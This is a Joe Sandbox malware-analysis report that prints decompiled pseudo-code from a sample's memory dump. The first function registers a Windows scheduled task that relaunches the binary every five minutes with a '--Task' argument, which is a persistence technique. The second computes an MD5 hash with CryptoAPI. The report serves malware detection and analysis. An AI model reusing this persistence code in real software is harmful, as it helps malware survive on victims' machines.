							}
							_t250 = _v32;
							_t251 =  *((intOrPtr*)( *_t250 + 0x1c))(_t250, _t479,  &_v24);
							_v8 = 1;
							E0040B1D0( &_v28, _t479);
							__eflags = _t251;
							if(__eflags >= 0) {
								_t253 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
								_v8 = 7;
								_t254 =  *_t253;
								__eflags = _t254;
								if(_t254 == 0) {
									_t480 = 0;
									__eflags = 0;
								} else {
									_t480 =  *_t254;
								}
								_t255 = _v24;
								 *((intOrPtr*)( *_t255 + 0x3c))(_t255, _t480, 0);
								_v8 = 1;
								E0040B1D0( &_v28, _t480);
								_t258 = _v32;
								_v20 = 0;
								_t259 =  *((intOrPtr*)( *_t258 + 0x24))(_t258, 0,  &_v20);
								_t410 = _v32;
								 *((intOrPtr*)( *_t410 + 8))(_t410);
								__eflags = _t259;
								if(_t259 >= 0) {
									_t261 = _v20;
									_v64 = 0;
									__eflags =  *((intOrPtr*)( *_t261 + 0x1c))(_t261,  &_v64);
									if(__eflags < 0) {
										L73:
										_t263 = _v24;
										 *((intOrPtr*)( *_t263 + 8))(_t263);
										_t265 = _v20;
										 *((intOrPtr*)( *_t265 + 8))(_t265);
										goto L74;
									} else {
										_t267 = E0040B140(_t397,  &_v28, __eflags, L"Author Name");
										_v8 = 8;
										_t268 =  *_t267;
										__eflags = _t268;
										if(_t268 == 0) {
											_t484 = 0;
											__eflags = 0;
										} else {
											_t484 =  *_t268;
										}
										_t269 = _v64;
										_t270 =  *((intOrPtr*)( *_t269 + 0x28))(_t269, _t484);
										_v8 = 1;
										E0040B1D0( &_v28, _t484);
										_t417 = _v64;
										 *((intOrPtr*)( *_t417 + 8))(_t417);
										__eflags = _t270;
										if(_t270 < 0) {
											goto L73;
										} else {
											_t273 = _v20;
											_v56 = 0;
											_t274 =  *((intOrPtr*)( *_t273 + 0x3c))(_t273,  &_v56);
											__eflags = _t274;
											if(_t274 < 0) {
												goto L73;
											} else {
												_t275 = _v56;
												_t276 =  *((intOrPtr*)( *_t275 + 0x38))(_t275, 3);
												_t420 = _v56;
												 *((intOrPtr*)( *_t420 + 8))(_t420);
												__eflags = _t276;
												if(_t276 < 0) {
													goto L73;
												} else {
													_t278 = _v20;
													_v48 = 0;
													_t279 =  *((intOrPtr*)( *_t278 + 0x2c))(_t278,  &_v48);
													__eflags = _t279;
													if(_t279 < 0) {
														goto L73;
													} else {
														_t280 = _v48;
														_t281 =  *((intOrPtr*)( *_t280 + 0x58))(_t280, 0xffffffff);
														_t423 = _v48;
														 *((intOrPtr*)( *_t423 + 8))(_t423);
														__eflags = _t281;
														if(_t281 < 0) {
															goto L73;
														} else {
															_t283 = _v48;
															_v76 = 0;
															__eflags =  *((intOrPtr*)( *_t283 + 0x9c))(_t283,  &_v76);
															if(__eflags < 0) {
																goto L73;
															} else {
																_t285 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
																_v8 = 9;
																_t286 =  *_t285;
																__eflags = _t286;
																if(_t286 == 0) {
																	_t491 = 0;
																	__eflags = 0;
																} else {
																	_t491 =  *_t286;
																}
																_t287 = _v76;
																_t288 =  *((intOrPtr*)( *_t287 + 0x28))(_t287, _t491);
																_v8 = 1;
																E0040B1D0( &_v28, _t491);
																_t428 = _v76;
																 *((intOrPtr*)( *_t428 + 8))(_t428);
																__eflags = _t288;
																if(_t288 < 0) {
																	goto L73;
																} else {
																	_t291 = _v20;
																	_v80 = 0;
																	_t292 =  *((intOrPtr*)( *_t291 + 0x24))(_t291,  &_v80);
																	__eflags = _t292;
																	if(_t292 < 0) {
																		goto L73;
																	} else {
																		_t293 = _v80;
																		_v68 = 0;
																		_t294 =  *((intOrPtr*)( *_t293 + 0x28))(_t293, 1,  &_v68);
																		_t431 = _v80;
																		 *((intOrPtr*)( *_t431 + 8))(_t431);
																		__eflags = _t294;
																		if(_t294 < 0) {
																			goto L73;
																		} else {
																			_t296 = _v68;
																			_v40 = 0;
																			_t297 =  *((intOrPtr*)( *_t296))(_t296, 0x4d50ec,  &_v40);
																			_t433 = _v68;
																			 *((intOrPtr*)( *_t433 + 8))(_t433);
																			__eflags = _t297;
																			if(_t297 < 0) {
																				goto L73;
																			} else {
																				_t299 = _v40;
																				__eflags =  *((intOrPtr*)( *_t299 + 0x28))(_t299,  &_v60);
																				if(__eflags < 0) {
																					goto L73;
																				} else {
																					_t301 = E0040B140(_t397,  &_v28, __eflags, L"PT5M");
																					_v8 = 0xa;
																					_t302 =  *_t301;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						_t499 = 0;
																						__eflags = 0;
																					} else {
																						_t499 =  *_t302;
																					}
																					_t303 = _v60;
																					_t304 =  *((intOrPtr*)( *_t303 + 0x20))(_t303, _t499);
																					_v8 = 1;
																					E0040B1D0( &_v28, _t499);
																					__eflags = _t304;
																					if(__eflags < 0) {
																						goto L73;
																					} else {
																						_t306 = E0040B140(_t397,  &_v28, __eflags, 0x500078);
																						_v8 = 0xb;
																						_t307 =  *_t306;
																						__eflags = _t307;
																						if(_t307 == 0) {
																							_t500 = 0;
																							__eflags = 0;
																						} else {
																							_t500 =  *_t307;
																						}
																						_t308 = _v60;
																						_t309 =  *((intOrPtr*)( *_t308 + 0x28))(_t308, _t500);
																						_v8 = 1;
																						E0040B1D0( &_v28, _t500);
																						__eflags = _t309;
																						if(_t309 < 0) {
																							goto L73;
																						} else {
																							_t311 = _v40;
																							__eflags =  *((intOrPtr*)( *_t311 + 0x2c))(_t311, _v60);
																							if(__eflags < 0) {
																								goto L73;
																							} else {
																								_t313 = E0040B140(_t397,  &_v28, __eflags, L"Trigger1");
																								_v8 = 0xc;
																								_t314 =  *_t313;
																								__eflags = _t314;
																								if(_t314 == 0) {
																									_t501 = 0;
																									__eflags = 0;
																								} else {
																									_t501 =  *_t314;
																								}
																								_t315 = _v40;
																								_t316 =  *((intOrPtr*)( *_t315 + 0x24))(_t315, _t501);
																								_v8 = 1;
																								E0040B1D0( &_v28, _t501);
																								__eflags = _t316;
																								if(__eflags < 0) {
																									goto L73;
																								} else {
																									_t318 = E0040B140(_t397,  &_v28, __eflags, L"2030-05-02T08:00:00");
																									_v8 = 0xd;
																									_t319 =  *_t318;
																									__eflags = _t319;
																									if(_t319 == 0) {
																										_t502 = 0;
																										__eflags = 0;
																									} else {
																										_t502 =  *_t319;
																									}
																									_t320 = _v40;
																									_t321 =  *((intOrPtr*)( *_t320 + 0x44))(_t320, _t502);
																									_v8 = 1;
																									E0040B1D0( &_v28, _t502);
																									__eflags = _t321;
																									if(__eflags < 0) {
																										goto L73;
																									} else {
																										E00423AAF( &_v28, _t502, __eflags,  &_v92);
																										asm("cdq");
																										_v92 = _v92 + _t517;
																										asm("adc [ebp-0x54], edx");
																										E004228E0( &_v324, 0x50, "%Y-%m-%dT%H:%M:%S", E00423551( &_v92));
																										_v33 = 0;
																										E00412C40(_t544, _t517,  &_v324);
																										_t332 = E00412900( &_v228, _v33);
																										_t544 = _t544 + 0x18;
																										_v8 = 0xe;
																										__eflags =  *((intOrPtr*)(_t332 + 0x14)) - 8;
																										if(__eflags >= 0) {
																											_t332 =  *_t332;
																										}
																										_t333 = E0040B140(_t397,  &_v28, __eflags, _t332);
																										_v8 = 0xf;
																										_t334 =  *_t333;
																										__eflags = _t334;
																										if(_t334 == 0) {
																											_t504 = 0;
																											__eflags = 0;
																										} else {
																											_t504 =  *_t334;
																										}
																										_t335 = _v40;
																										_t336 =  *((intOrPtr*)( *_t335 + 0x3c))(_t335, _t504);
																										E0040B1D0( &_v28, _t504);
																										_v8 = 1;
																										E00413210( &_v228);
																										_t454 = _v40;
																										 *((intOrPtr*)( *_t454 + 8))(_t454);
																										__eflags = _t336;
																										if(_t336 < 0) {
																											goto L73;
																										} else {
																											_t340 = _v20;
																											_v52 = 0;
																											_t341 =  *((intOrPtr*)( *_t340 + 0x44))(_t340,  &_v52);
																											__eflags = _t341;
																											if(_t341 < 0) {
																												goto L73;
																											} else {
																												_t342 = _v52;
																												_v72 = 0;
																												_t343 =  *((intOrPtr*)( *_t342 + 0x30))(_t342, 0,  &_v72);
																												_t457 = _v52;
																												 *((intOrPtr*)( *_t457 + 8))(_t457);
																												__eflags = _t343;
																												if(_t343 < 0) {
																													goto L73;
																												} else {
																													_t345 = _v72;
																													_v44 = 0;
																													_t346 =  *((intOrPtr*)( *_t345))(_t345, 0x4d511c,  &_v44);
																													_t459 = _v72;
																													 *((intOrPtr*)( *_t459 + 8))(_t459);
																													__eflags = _t346;
																													if(_t346 < 0) {
																														goto L73;
																													} else {
																														__eflags = _v100 - 8;
																														_t349 =  >=  ? _v120 :  &_v120;
																														_t350 = E0040B140(_t397,  &_v28, _v100 - 8,  >=  ? _v120 :  &_v120);
																														_v8 = 0x10;
																														_t511 =  *_t350;
																														__eflags = _t511;
																														if(_t511 == 0) {
																															_t512 = 0;
																															__eflags = 0;
																														} else {
																															_t512 =  *_t511;
																														}
																														_t351 = _v44;
																														_t352 =  *((intOrPtr*)( *_t351 + 0x2c))(_t351, _t512);
																														_v8 = 1;
																														E0040B1D0( &_v28, _t512);
																														__eflags = _t352;
																														if(__eflags >= 0) {
																															_t354 = E0040B140(_t397,  &_v28, __eflags, L"--Task");
																															_v8 = 0x11;
																															_t355 =  *_t354;
																															__eflags = _t355;
																															if(_t355 == 0) {
																																_t513 = 0;
																																__eflags = 0;
																															} else {
																																_t513 =  *_t355;
																															}
																															_t356 = _v44;
																															_t357 =  *((intOrPtr*)( *_t356 + 0x34))(_t356, _t513);
																															_v8 = 1;
																															_t539 = _t357;
																															E0040B1D0( &_v28, _t513);
																															_t466 = _v44;
																															 *((intOrPtr*)( *_t466 + 8))(_t466);
																															__eflags = _t357;
																															if(_t357 < 0) {
																																goto L73;
																															} else {
																																_v96 = 0;
																																E0040B400( &_v172, _t539, _t466);
																																asm("movdqu xmm0, [eax]");
																																asm("movdqu [ebp-0xd8], xmm0");
																																 *_t397( &_v140);
																																asm("movdqu xmm0, [ebp-0x88]");
																																asm("movdqu [ebp-0xc8], xmm0");
																																 *_t397( &_v156);
																																_v8 = 0x14;
																																asm("movdqu xmm0, [ebp-0x98]");
																																asm("movdqu [ebp-0xb8], xmm0");
																																_t365 = E0040B140(_t397,  &_v28, __eflags, L"Time Trigger Task");
																																_v8 = 0x15;
																																_t540 =  *_t365;
																																__eflags = _t540;
																																if(_t540 == 0) {
																																	_t541 = 0;
																																	__eflags = 0;
																																} else {
																																	_t541 =  *_t540;
																																}
																																asm("movdqu xmm0, [ebp-0xd8]");
																																_t469 = _v24;
																																asm("movdqu [eax], xmm0");
																																_t544 = _t544 - 0xfffffffffffffff0;
																																asm("movdqu xmm0, [ebp-0xc8]");
																																asm("movdqu [eax], xmm0");
																																asm("movdqu xmm0, [ebp-0xb8]");
																																asm("movdqu [eax], xmm0");
																																_t542 =  *((intOrPtr*)( *_t469 + 0x44))(_t469, _t541, _v20, 6, 3,  &_v96);
																																E0040B1D0( &_v28,  *_t469);
																																_t398 = __imp__#9;
																																 *_t398( &_v156);
																																 *_t398( &_v140);
																																_v8 = 1;
																																 *_t398( &_v172);
																																__eflags = _t542;
																																if(_t542 >= 0) {
																																	_t378 = _v24;
																																	 *((intOrPtr*)( *_t378 + 8))(_t378);
																																	_t380 = _v20;
																																	 *((intOrPtr*)( *_t380 + 8))(_t380);
																																	_t382 = _v96;
																																	 *((intOrPtr*)( *_t382 + 8))(_t382);
																																	__imp__CoUninitialize();
																																	_t395 = 1;
																																} else {
																																	swprintf( &_v1348, 0x400, "RegisterTaskDefinition. Err: %X\n", _t542);
																																	_t544 = _t544 + 0x10;
																																	goto L73;
																																}
																															}
																														} else {
																															_t386 = _v44;
																															 *((intOrPtr*)( *_t386 + 8))(_t386);
																															goto L73;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									_t388 = _v24;
									 *((intOrPtr*)( *_t388 + 8))(_t388);
									__imp__CoUninitialize();
									_t395 = 0;
								}
							} else {
								_t390 = _v32;
								 *((intOrPtr*)( *_t390 + 8))(_t390);
								__imp__CoUninitialize();
								_t395 = 0;
							}
						} else {
							_t392 = _v32;
							 *((intOrPtr*)( *_t392 + 8))(_t392);
							__imp__CoUninitialize();
							_t395 = 0;
						}
					}
					__eflags = _v100 - 8;
					if(_v100 >= 8) {
						L00422587(_v120);
						_t544 = _t544 + 4;
					}
					__eflags = 0;
					_v100 = 7;
					_v104 = 0;
					_v120 = 0;
				} else {
					_t395 = 0;
				}
				if(_a24 >= 8) {
					L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t395;
			}

0x0040d24a
0x0040d251
0x0040d258
0x0040d261
0x0040d265
0x0040d26c
0x0040d274
0x0040d28f
0x0040d297
0x0040d2a1
0x0040d2ab
0x0040d2b3
0x0040d2b8
0x0040d2bb
0x0040d2ce
0x0040d2d5
0x0040d2db
0x0040d2dd
0x0040da3c
0x0040da3c
0x0040da42
0x0040d2e3
0x0040d2e3
0x0040d2f0
0x0040d2f2
0x0040d301
0x0040d309
0x0040d30b
0x0040d31a
0x0040d322
0x0040d324
0x0040d333
0x0040d33b
0x0040d33d
0x0040d344
0x0040d34c
0x0040d356
0x0040d35f
0x0040d367
0x0040d36d
0x0040d370
0x0040d378
0x0040d37e
0x0040d387
0x0040d38b
0x0040d397
0x0040d3a4
0x0040d3b1
0x0040d3bd
0x0040d3c2
0x0040d3c8
0x0040d3ca
0x0040d3ea
0x0040d3f1
0x0040d3f6
0x0040d3fa
0x0040d3fc
0x0040d3fe
0x0040d404
0x0040d404
0x0040d400
0x0040d400
0x0040d400
0x0040d406
0x0040d411
0x0040d417
0x0040d41d
0x0040d422
0x0040d424
0x0040d444
0x0040d449
0x0040d44d
0x0040d44f
0x0040d451
0x0040d457
0x0040d457
0x0040d453
0x0040d453
0x0040d453
0x0040d459
0x0040d462
0x0040d468
0x0040d46c
0x0040d471
0x0040d478
0x0040d484
0x0040d487
0x0040d48f
0x0040d492
0x0040d494
0x0040d4ac
0x0040d4b2
0x0040d4c0
0x0040d4c2
0x0040da2a
0x0040da2a
0x0040da30
0x0040da33
0x0040da39
0x00000000
0x0040d4c8
0x0040d4d0
0x0040d4d5
0x0040d4d9
0x0040d4db
0x0040d4dd
0x0040d4e3
0x0040d4e3
0x0040d4df
0x0040d4df
0x0040d4df
0x0040d4e5
0x0040d4ec
0x0040d4f2
0x0040d4f8
0x0040d4fd
0x0040d503
0x0040d506
0x0040d508
0x00000000
0x0040d50e
0x0040d50e
0x0040d514
0x0040d51f
0x0040d522
0x0040d524
0x00000000
0x0040d52a
0x0040d52a
0x0040d532
0x0040d535
0x0040d53d
0x0040d540
0x0040d542
0x00000000
0x0040d548
0x0040d548
0x0040d54e
0x0040d559
0x0040d55c
0x0040d55e
0x00000000
0x0040d564
0x0040d564
0x0040d56c
0x0040d56f
0x0040d577
0x0040d57a
0x0040d57c
0x00000000
0x0040d582
0x0040d582
0x0040d588
0x0040d599
0x0040d59b
0x00000000
0x0040d5a1
0x0040d5a9
0x0040d5ae
0x0040d5b2
0x0040d5b4
0x0040d5b6
0x0040d5bc
0x0040d5bc
0x0040d5b8
0x0040d5b8
0x0040d5b8
0x0040d5be
0x0040d5c5
0x0040d5cb
0x0040d5d1
0x0040d5d6
0x0040d5dc
0x0040d5df
0x0040d5e1
0x00000000
0x0040d5e7
0x0040d5e7
0x0040d5ed
0x0040d5f8
0x0040d5fb
0x0040d5fd
0x00000000
0x0040d603
0x0040d603
0x0040d60a
0x0040d616
0x0040d619
0x0040d621
0x0040d624
0x0040d626
0x00000000
0x0040d62c
0x0040d62c
0x0040d633
0x0040d642
0x0040d644
0x0040d64c
0x0040d64f
0x0040d651
0x00000000
0x0040d657
0x0040d657
0x0040d664
0x0040d666
0x00000000
0x0040d66c
0x0040d674
0x0040d679
0x0040d67d
0x0040d67f
0x0040d681
0x0040d687
0x0040d687
0x0040d683
0x0040d683
0x0040d683
0x0040d689
0x0040d690
0x0040d696
0x0040d69c
0x0040d6a1
0x0040d6a3
0x00000000
0x0040d6a9
0x0040d6b1
0x0040d6b6
0x0040d6ba
0x0040d6bc
0x0040d6be
0x0040d6c4
0x0040d6c4
0x0040d6c0
0x0040d6c0
0x0040d6c0
0x0040d6c6
0x0040d6cd
0x0040d6d3
0x0040d6d9
0x0040d6de
0x0040d6e0
0x00000000
0x0040d6e6
0x0040d6e6
0x0040d6f2
0x0040d6f4
0x00000000
0x0040d6fa
0x0040d702
0x0040d707
0x0040d70b
0x0040d70d
0x0040d70f
0x0040d715
0x0040d715
0x0040d711
0x0040d711
0x0040d711
0x0040d717
0x0040d71e
0x0040d724
0x0040d72a
0x0040d72f
0x0040d731
0x00000000
0x0040d737
0x0040d73f
0x0040d744
0x0040d748
0x0040d74a
0x0040d74c
0x0040d752
0x0040d752
0x0040d74e
0x0040d74e
0x0040d74e
0x0040d754
0x0040d75b
0x0040d761
0x0040d767
0x0040d76c
0x0040d76e
0x00000000
0x0040d774
0x0040d778
0x0040d77f
0x0040d780
0x0040d787
0x0040d79e
0x0040d7a9
0x0040d7b0
0x0040d7be
0x0040d7c3
0x0040d7c6
0x0040d7ca
0x0040d7ce
0x0040d7d0
0x0040d7d0
0x0040d7d6
0x0040d7db
0x0040d7df
0x0040d7e1
0x0040d7e3
0x0040d7e9
0x0040d7e9
0x0040d7e5
0x0040d7e5
0x0040d7e5
0x0040d7eb
0x0040d7f2
0x0040d7fa
0x0040d805
0x0040d809
0x0040d80e
0x0040d814
0x0040d817
0x0040d819
0x00000000
0x0040d81f
0x0040d81f
0x0040d825
0x0040d830
0x0040d833
0x0040d835
0x00000000
0x0040d83b
0x0040d83b
0x0040d842
0x0040d84e
0x0040d851
0x0040d859
0x0040d85c
0x0040d85e
0x00000000
0x0040d864
0x0040d864
0x0040d86b
0x0040d87a
0x0040d87c
0x0040d884
0x0040d887
0x0040d889
0x00000000
0x0040d88f
0x0040d88f
0x0040d899
0x0040d89e
0x0040d8a3
0x0040d8a7
0x0040d8a9
0x0040d8ab
0x0040d8b1
0x0040d8b1
0x0040d8ad
0x0040d8ad
0x0040d8ad
0x0040d8b3
0x0040d8ba
0x0040d8c0
0x0040d8c6
0x0040d8cb
0x0040d8cd
0x0040d8e5
0x0040d8ea
0x0040d8ee
0x0040d8f0
0x0040d8f2
0x0040d8f8
0x0040d8f8
0x0040d8f4
0x0040d8f4
0x0040d8f4
0x0040d8fa
0x0040d901
0x0040d907
0x0040d90b
0x0040d90d
0x0040d912
0x0040d918
0x0040d91b
0x0040d91d
0x00000000
0x0040d923
0x0040d92a
0x0040d931
0x0040d936
0x0040d941
0x0040d949
0x0040d94b
0x0040d95a
0x0040d962
0x0040d964
0x0040d96b
0x0040d978
0x0040d980
0x0040d985
0x0040d989
0x0040d98b
0x0040d98d
0x0040d993
0x0040d993
0x0040d98f
0x0040d98f
0x0040d98f
0x0040d995
0x0040d99d
0x0040d9b0
0x0040d9b6
0x0040d9b9
0x0040d9c1
0x0040d9c7
0x0040d9d4
0x0040d9e0
0x0040d9e2
0x0040d9e7
0x0040d9f4
0x0040d9fd
0x0040da05
0x0040da0a
0x0040da0c
0x0040da0e
0x0040da46
0x0040da4c
0x0040da4f
0x0040da55
0x0040da58
0x0040da5e
0x0040da61
0x0040da67
0x0040da10
0x0040da22
0x0040da27
0x00000000
0x0040da27
0x0040da0e
0x0040d8cf
0x0040d8cf
0x0040d8d5
0x00000000
0x0040d8d5
0x0040d8cd
0x0040d889
0x0040d85e
0x0040d835
0x0040d819
0x0040d76e
0x0040d731
0x0040d6f4
0x0040d6e0
0x0040d6a3
0x0040d666
0x0040d651
0x0040d626
0x0040d5fd
0x0040d5e1
0x0040d59b
0x0040d57c
0x0040d55e
0x0040d542
0x0040d524
0x0040d508
0x0040d496
0x0040d496
0x0040d49c
0x0040d49f
0x0040d4a5
0x0040d4a5
0x0040d426
0x0040d426
0x0040d42c
0x0040d42f
0x0040d435
0x0040d435
0x0040d3cc
0x0040d3cc
0x0040d3d2
0x0040d3d5
0x0040d3db
0x0040d3db
0x0040d3ca
0x0040da69
0x0040da6d
0x0040da72
0x0040da77
0x0040da77
0x0040da7a
0x0040da7c
0x0040da83
0x0040da8a
0x0040d276
0x0040d276
0x0040d276
0x0040da92
0x0040da97
0x0040da9c
0x0040daa6
0x0040dab1

APIs

CoInitialize.OLE32(00000000), ref: 0040D26C
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
VariantInit.OLEAUT32(?), ref: 0040D2F0
VariantInit.OLEAUT32(?), ref: 0040D309
VariantInit.OLEAUT32(?), ref: 0040D322
VariantInit.OLEAUT32(?), ref: 0040D33B
VariantClear.OLEAUT32(?), ref: 0040D397
VariantClear.OLEAUT32(?), ref: 0040D3A4
VariantClear.OLEAUT32(?), ref: 0040D3B1
VariantClear.OLEAUT32(?), ref: 0040D3C2
CoUninitialize.OLE32 ref: 0040D3D5

Strings

--Task, xrefs: 0040D8DD
Author Name, xrefs: 0040D4C8
Time Trigger Task, xrefs: 0040D43C, 0040D973
PT5M, xrefs: 0040D5A1, 0040D66C
RegisterTaskDefinition. Err: %X, xrefs: 0040DA11
2030-05-02T08:00:00, xrefs: 0040D737
Trigger1, xrefs: 0040D6FA
%Y-%m-%dT%H:%M:%S, xrefs: 0040D790

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
API String ID: 2496729271-1738591096
Opcode ID: 2e7ac1008a584a096b31fa7abe0d55f111b933191d2631641847fb29501f4b14
Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
Opcode Fuzzy Hash: 2e7ac1008a584a096b31fa7abe0d55f111b933191d2631641847fb29501f4b14
Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149
encryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00410FC0(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				int _v48;
				char _v52;
				char _v56;
				char _v68;
				void* __ebx;
				void* __edi;
				long** _t40;
				int* _t41;
				int _t42;
				char _t44;
				char _t50;
				void* _t72;
				CHAR** _t73;
				void* _t80;
				int _t81;
				void* _t83;
				CHAR* _t84;
				intOrPtr* _t85;
				void* _t87;
				intOrPtr _t89;
				intOrPtr _t90;
				void* _t92;
				void* _t93;

				_t79 = __edx;
				 *[fs:0x0] = _t89;
				_t90 = _t89 - 0x34;
				_v20 = _t90;
				_t40 =  &_v32;
				_t73 = __edx;
				_v32 = 0;
				_t84 = __ecx;
				_v28 = 0;
				_v36 = 0;
				_v8 = 0;
				__imp__CryptAcquireContextW(_t40, 0, 0, 1, 0xf0000000, _t80, _t83, _t72,  *[fs:0x0], 0x4cabe0, 0xffffffff);
				if(_t40 == 0) {
					_v40 = _t40;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t41 =  &_v28;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t41);
				if(_t41 == 0) {
					_v44 = _t41;
					E00430ECA( &_v44, 0x5085b8);
				}
				_t42 = lstrlenA(_t84);
				__imp__CryptHashData(_v28, _t84, _t42, 0);
				if(_t42 == 0) {
					_v48 = _t42;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t85 = __imp__CryptGetHashParam;
				_v24 = 0;
				_t44 =  *_t85(_v28, 2, 0,  &_v24, 0);
				_t98 = _t44;
				if(_t44 == 0) {
					_v52 = _t44;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t81 = E00420BE4(_t73, _t80, _t98, _v24 + 1);
				_v36 = _t81;
				E0042B420(_t81, 0, _v24 + 1);
				_t92 = _t90 + 0x10;
				_t50 =  *_t85(_v28, 2, _t81,  &_v24, 0);
				if(_t50 == 0) {
					_v56 = _t50;
					E00430ECA( &_v56, 0x5085b8);
				}
				 *_t73 = E00420C62(_t73, _t79, _t81, 0x14 + _v24 * 2);
				E0042B420(_t52, 0, 0x14 + _v24 * 2);
				_t87 = 0;
				_t93 = _t92 + 0x10;
				if(_v24 > 0) {
					do {
						E004204A6( &_v68, "%.2X",  *(_t87 + _t81) & 0x000000ff);
						_t93 = _t93 + 0xc;
						lstrcatA( *_t73,  &_v68);
						_t87 = _t87 + 1;
					} while (_t87 < _v24);
				}
				E00422110(_t81);
				__imp__CryptDestroyHash(_v28);
				CryptReleaseContext(_v32, 0);
				 *[fs:0x0] = _v16;
				return 1;
			}

0x00410fc0
0x00410fd1
0x00410fd8
0x00410fde
0x00410fe1
0x00410ff0
0x00410ff2
0x00410ff9
0x00410ffb
0x00411002
0x00411009
0x00411010
0x00411018
0x0041101a
0x00411026
0x00411026
0x0041102b
0x0041103b
0x00411043
0x00411045
0x00411051
0x00411051
0x00411059
0x00411064
0x0041106c
0x0041106e
0x0041107a
0x0041107a
0x0041107f
0x00411092
0x00411099
0x0041109b
0x0041109d
0x0041109f
0x004110ab
0x004110ab
0x004110c1
0x004110c3
0x004110ca
0x004110cf
0x004110de
0x004110e2
0x004110e4
0x004110f0
0x004110f0
0x00411109
0x0041110b
0x00411110
0x00411112
0x00411118
0x00411120
0x0041112e
0x00411133
0x0041113c
0x00411142
0x00411143
0x00411120
0x00411149
0x00411154
0x0041115f
0x0041116a
0x00411177

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
__CxxThrowException@8.LIBCMT ref: 00411026

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
__CxxThrowException@8.LIBCMT ref: 00411051
lstrlenA.KERNEL32(?,00000000), ref: 00411059
CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
__CxxThrowException@8.LIBCMT ref: 0041107A
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
__CxxThrowException@8.LIBCMT ref: 004110AB
_memset.LIBCMT ref: 004110CA
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
__CxxThrowException@8.LIBCMT ref: 004110F0
_malloc.LIBCMT ref: 00411100
_memset.LIBCMT ref: 0041110B
_sprintf.LIBCMT ref: 0041112E
lstrcatA.KERNEL32(?,?), ref: 0041113C
CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F

Strings

%.2X, xrefs: 00411128

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
String ID: %.2X
API String ID: 2451520719-213608013
Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95
stringmemorywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411900(WCHAR* __ecx, long __edx, WCHAR* _a4) {
				short _v8;
				WCHAR* _v12;
				short _v2060;
				int _t15;
				long _t36;
				void* _t44;
				WCHAR* _t48;

				_t36 = __edx;
				_v12 = __ecx;
				if(__edx == 0) {
					_t36 = GetLastError();
				}
				FormatMessageW(0x1300, 0, _t36, 0x400,  &_v8, 0, 0);
				_t15 = lstrlenW(_v8);
				_t44 = LocalAlloc(0x40, 0x50 + (_t15 + lstrlenW(_v12)) * 2);
				lstrcpyW(_t44, _v12);
				lstrcatW(_t44, L" failed with error ");
				E00412AC0(_t36,  &_v2060);
				lstrcatW(_t44,  &_v2060);
				lstrcatW(_t44, L": ");
				lstrcatW(_t44, _v8);
				_t48 = _a4;
				if(_t48 == 0) {
